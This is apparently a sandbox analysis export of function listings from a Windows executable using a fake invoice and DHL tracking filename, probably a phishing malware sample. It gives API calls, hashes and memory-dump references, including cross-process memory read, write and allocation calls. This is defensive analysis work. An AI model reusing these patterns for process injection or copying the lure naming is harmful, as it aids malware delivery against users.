API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 2ef6ad04a1427489c6d2ad9b1713ed0c4ec6fe18a998b475bd347fdebb59028a
Instruction ID: 4ed6cdf9d6976c148567e7f9fd8ca272fe3e0bd2c1d752201ac9e38fb47a593a
Opcode Fuzzy Hash: 2ef6ad04a1427489c6d2ad9b1713ed0c4ec6fe18a998b475bd347fdebb59028a
Instruction Fuzzy Hash: 8B01AD72600204BFDB109F68EC88BAB7AEDEF44792F144136F905E2210E7B9DD408BA4

Function 0046E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0046E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0046E9A5
Sleep.KERNEL32(00000000), ref: 0046E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0046E9B7
Sleep.KERNEL32 ref: 0046E9F3

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 2aeaa79d5672aed6268297b647a7432b7ce9414ded8618e8230f64fce08111e6
Instruction ID: e8df75264cfc46d5542beadfd56f5430bc66c85ba3907fffc5f89a1a7ce3f043
Opcode Fuzzy Hash: 2aeaa79d5672aed6268297b647a7432b7ce9414ded8618e8230f64fce08111e6
Instruction Fuzzy Hash: 08015B75C01529DBCF00AFE6D9996DEBBB8BF09700F000567E502B2240DB3895598BAA

Function 004610F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00461114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00460B9B,?,?,?), ref: 00461120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00460B9B,?,?,?), ref: 0046112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00460B9B,?,?,?), ref: 00461136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0046114D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: ce014c5868846d7c8cbeb970d1f65daabd8744abfde489563efd0793294f8ce4
Instruction ID: 905019f768625a34e11d31e15c1025594aaff330f26edc8ff24bb3a527f57659
Opcode Fuzzy Hash: ce014c5868846d7c8cbeb970d1f65daabd8744abfde489563efd0793294f8ce4
Instruction Fuzzy Hash: 53011D75100205BFDB114FA5DC89AAB3B6EEF8A360B544476FA45D7360EA31DC009A68

Function 00460FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00460FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00460FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00460FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00460FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00461002

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 80b7b46aa13c80867e1358b9b29a91cb199ce5f3faa2ad2d12c0a4ab802f4a79
Instruction ID: 19f58f7f2ef5baa3176ae181a887f72838396cd1930da02c92509eb2eca7197d
Opcode Fuzzy Hash: 80b7b46aa13c80867e1358b9b29a91cb199ce5f3faa2ad2d12c0a4ab802f4a79
Instruction Fuzzy Hash: 9EF0A935200301ABDB210FA49C8AF5B3BADEF99762F200436FA05D6260DA30DC408A78

Function 00461014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0046102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00461036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00461045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0046104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00461062

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 56d3426fd5648950043470301933ab3bbbda605344f19258b7462d08cd539152
Instruction ID: 7a717aa150d4942d0c10e89215848741cb31b7faf8bb8dd1e0430935280b2535
Opcode Fuzzy Hash: 56d3426fd5648950043470301933ab3bbbda605344f19258b7462d08cd539152
Instruction Fuzzy Hash: 95F06D35240311EBDB215FA4EC89F5B3BADEF99761F240436FA45E7260DA74D8408AB8

Function 0047030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0047017D,?,004732FC,?,00000001,00442592,?), ref: 00470324
CloseHandle.KERNEL32(?,?,?,?,0047017D,?,004732FC,?,00000001,00442592,?), ref: 00470331
CloseHandle.KERNEL32(?,?,?,?,0047017D,?,004732FC,?,00000001,00442592,?), ref: 0047033E
CloseHandle.KERNEL32(?,?,?,?,0047017D,?,004732FC,?,00000001,00442592,?), ref: 0047034B
CloseHandle.KERNEL32(?,?,?,?,0047017D,?,004732FC,?,00000001,00442592,?), ref: 00470358
CloseHandle.KERNEL32(?,?,?,?,0047017D,?,004732FC,?,00000001,00442592,?), ref: 00470365

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c0b52786944a190897126378818267e3c41e3c129c4972858b0d9542f89387ea
Instruction ID: 15ace0418df84187642c2314bf566344365291e49933a4038b0db5ea42340f64
Opcode Fuzzy Hash: c0b52786944a190897126378818267e3c41e3c129c4972858b0d9542f89387ea
Instruction Fuzzy Hash: 56019072801B15DFC7309F66D880453F7F5BE602153158A3FD59A52A31C375A954CE84

Function 0043D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043D752

Part of subcall function 004329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000), ref: 004329DE
Part of subcall function 004329C8: GetLastError.KERNEL32(00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000,00000000), ref: 004329F0

_free.LIBCMT ref: 0043D764
_free.LIBCMT ref: 0043D776
_free.LIBCMT ref: 0043D788
_free.LIBCMT ref: 0043D79A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 80a46d3f4cdf48cc1f4cb3fd7009116c9b0e75df3a7578b7af18df310060968e
Instruction ID: f5ce886cc1531f6a28f8f015eef13142195b22a627306931412e56b56f15fa43
Opcode Fuzzy Hash: 80a46d3f4cdf48cc1f4cb3fd7009116c9b0e75df3a7578b7af18df310060968e
Instruction Fuzzy Hash: 64F03CB2A00214AB8661FB65FAC2D1777DDBB08310F94281AF048D7601C738FC808A6C

Function 00465C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00465C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00465C6F
MessageBeep.USER32(00000000), ref: 00465C87
KillTimer.USER32(?,0000040A), ref: 00465CA3
EndDialog.USER32(?,00000001), ref: 00465CBD

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 99409bf667dfd5146e04d6ca95f67e3c88710ae28e4330c26662dce5bcfe50df
Instruction ID: d2f2f99a99c3866907f2b8e9e78720351076807077f306acab77195a7e7bd78d
Opcode Fuzzy Hash: 99409bf667dfd5146e04d6ca95f67e3c88710ae28e4330c26662dce5bcfe50df
Instruction Fuzzy Hash: 99018670500B04AFFB205B10DD8EFA67BB8BB10B05F00057BA583A10E1EBF4AD848B99

Function 004322A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004322BE

Part of subcall function 004329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000), ref: 004329DE
Part of subcall function 004329C8: GetLastError.KERNEL32(00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000,00000000), ref: 004329F0

_free.LIBCMT ref: 004322D0
_free.LIBCMT ref: 004322E3
_free.LIBCMT ref: 004322F4
_free.LIBCMT ref: 00432305

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4123fa34cb97fe27cc116b7268a18f97c13ccf456534f8fabfb79b2512b9f43b
Instruction ID: 89911822197d56008bbfa5947ace786dcece450e15fc45a2089b3a214c72ff9d
Opcode Fuzzy Hash: 4123fa34cb97fe27cc116b7268a18f97c13ccf456534f8fabfb79b2512b9f43b
Instruction Fuzzy Hash: 4EF03AF89021309B8612BF55BD41A0E3B64FB1C761F1115AFF814E32B1C7B90812ABAC

Function 004195C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004195D4
StrokeAndFillPath.GDI32(?,?,004571F7,00000000,?,?,?), ref: 004195F0
SelectObject.GDI32(?,00000000), ref: 00419603
DeleteObject.GDI32 ref: 00419616
StrokePath.GDI32(?), ref: 00419631

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 1fa8cac9b5671377a88cd9069445daa392776c05a8e75c04debd9cfbfa3f9ee5
Instruction ID: 238536ff26761e07678ffaf61f955209fe333ea733f2b2e557bdad333fde91c8
Opcode Fuzzy Hash: 1fa8cac9b5671377a88cd9069445daa392776c05a8e75c04debd9cfbfa3f9ee5
Instruction Fuzzy Hash: 6EF03771007208FBDB265F69ED6CBA93B61AB10322F048276F825651F1C7348992DF3C

Function 00430F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 004310F9
__freea.LIBCMT ref: 00431117

Part of subcall function 00431537: _free.LIBCMT ref: 0043154F

Strings

a/p, xrefs: 004311DE
am/pm, xrefs: 0043117A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: ea3ff1d5b773863d711455d32771d517fa4c043961c4b2310e599dbe605c66e5
Instruction ID: e7f55f0000d1cb7e47c77de890cae059c8a33d49be9b46a5649e7d8ef9c59423
Opcode Fuzzy Hash: ea3ff1d5b773863d711455d32771d517fa4c043961c4b2310e599dbe605c66e5
Instruction Fuzzy Hash: 9CD1D331900205DAEB289F68C855BFBB7B1EF0D300F24615BE941ABB61D37D9D81CB5A

Function 004861D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00420242: EnterCriticalSection.KERNEL32(004D070C,004D1884,?,?,0041198B,004D2518,?,?,?,004012F9,00000000), ref: 0042024D
Part of subcall function 00420242: LeaveCriticalSection.KERNEL32(004D070C,?,0041198B,004D2518,?,?,?,004012F9,00000000), ref: 0042028A

Part of subcall function 004200A3: __onexit.LIBCMT ref: 004200A9

__Init_thread_footer.LIBCMT ref: 00486238

Part of subcall function 004201F8: EnterCriticalSection.KERNEL32(004D070C,?,?,00418747,004D2514), ref: 00420202
Part of subcall function 004201F8: LeaveCriticalSection.KERNEL32(004D070C,?,00418747,004D2514), ref: 00420235

Part of subcall function 0047359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004735E4
Part of subcall function 0047359C: LoadStringW.USER32(004D2390,?,00000FFF,?), ref: 0047360A

Strings

x#M, xrefs: 00486353
x#M, xrefs: 0048633A
x#M, xrefs: 0048636F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#M$x#M$x#M
API String ID: 1072379062-3829861524
Opcode ID: 3df73f709b3f556fbaefde3115f804a6d6e55e6488ed90262b3a3554c009390c
Instruction ID: ad22d8bb0a2c6c26de9bbcbdc3a22a2ffba9b188311ff05807625ef18eb72349
Opcode Fuzzy Hash: 3df73f709b3f556fbaefde3115f804a6d6e55e6488ed90262b3a3554c009390c
Instruction Fuzzy Hash: 1FC17C71A00105AFCB14EF58D890EBEB7B9EF48304F11846EE905AB391DB78ED45CB99

Function 00438A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00438B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00438B7A
__dosmaperr.LIBCMT ref: 00438B81

Strings

.B, xrefs: 00438A63

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .B
API String ID: 2434981716-829718130
Opcode ID: 70e0843d2617bb1ac96e5cc782c8146a09cdeed1e6b94f01a2576126441d1abf
Instruction ID: d9a944dd131fce4de3f862138ce5449590071cef698f36b4de1b46f389f44ad8
Opcode Fuzzy Hash: 70e0843d2617bb1ac96e5cc782c8146a09cdeed1e6b94f01a2576126441d1abf
Instruction Fuzzy Hash: 8D418070604246AFDB249F24CC81A7AFFA5DB8E304F2855AFF45487252DE399C03875C

Function 00462716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0046B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004621D0,?,?,00000034,00000800,?,00000034), ref: 0046B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00462760

Part of subcall function 0046B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004621FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0046B3F8

Part of subcall function 0046B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0046B355
Part of subcall function 0046B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00462194,00000034,?,?,00001004,00000000,00000000), ref: 0046B365
Part of subcall function 0046B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00462194,00000034,?,?,00001004,00000000,00000000), ref: 0046B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004627CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0046281A

Strings

@, xrefs: 00462832

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: e39cb11c52d900d99a61f6393d528a1cc770f9b1bdda61df4e84e090e70b983a
Instruction ID: ff5d13f5b86c1eaaf45520e5384042095ddc4846ce58a2d293a81ddafc3f8c7f
Opcode Fuzzy Hash: e39cb11c52d900d99a61f6393d528a1cc770f9b1bdda61df4e84e090e70b983a
Instruction Fuzzy Hash: 82412E72900218BFDB10DBA4CD41EDEBBB8EF05304F00405AFA55B7181EB746E85CBA5

Function 0043172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe,00000104), ref: 00431769
_free.LIBCMT ref: 00431834
_free.LIBCMT ref: 0043183E

Strings

C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, xrefs: 00431760, 00431767, 00431796, 004317CE

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
API String ID: 2506810119-3025384112
Opcode ID: e9c9499fd060a66b16600f024b2810deb7c0494803fa76e7a6b1ded376093660
Instruction ID: e674aad6335fce6784df1a39a9e93ca8c5f84d3287671f514f1e0804a55ea8d6
Opcode Fuzzy Hash: e9c9499fd060a66b16600f024b2810deb7c0494803fa76e7a6b1ded376093660
Instruction Fuzzy Hash: 28318375A00218BBDB25DB9A9C85D9FBBBCEB89314F1451ABE804D7221D7744A40CB98

Function 0046C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0046C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0046C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004D1990,00C96118), ref: 0046C395

Strings

0, xrefs: 0046C2DF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 06fa2ef0e1f7f7ce18e9ba52c077ddcba619eddbc0651f459a18e64a4b6f570c
Instruction ID: a5a26f86fb8e3f621b5e9a31252ed0baa9d5e6f3d5edcb6defe443f1a9038187
Opcode Fuzzy Hash: 06fa2ef0e1f7f7ce18e9ba52c077ddcba619eddbc0651f459a18e64a4b6f570c
Instruction Fuzzy Hash: 454180712043019FD720DF25D884B2ABBE4AB85324F04862EEDA5973D1E738E944CB6B

Function 00494416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0049CC08,00000000,?,?,?,?), ref: 004944AA
GetWindowLongW.USER32 ref: 004944C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004944D7

Strings

SysTreeView32, xrefs: 0049447C

Memory Dump Source

